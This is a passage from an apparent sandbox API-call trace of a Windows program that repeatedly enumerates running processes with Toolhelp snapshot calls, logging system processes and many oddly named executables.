cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.501] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0138.503] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.504] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0138.507] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0138.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0138.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0138.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0138.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0138.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0138.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0138.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0138.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0138.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0138.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0138.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0138.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0138.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0138.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0138.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0138.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0138.544] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0138.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0138.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0138.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0138.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0138.550] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0138.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0138.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0138.562] CloseHandle (hObject=0xbc) returned 1 [0138.562] Sleep (dwMilliseconds=0x12c) [0138.885] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0138.893] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0138.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0138.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0138.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0138.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0138.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0138.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0138.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.906] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0138.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0138.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0138.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0138.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0138.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.922] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.924] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0138.925] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0138.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0139.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0139.009] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0139.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0139.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0139.013] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0139.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0139.016] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0139.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0139.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0139.020] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0139.023] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0139.024] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0139.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0139.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0139.028] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0139.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0139.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0139.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0139.036] CloseHandle (hObject=0xc4) returned 1 [0139.036] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0139.041] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, 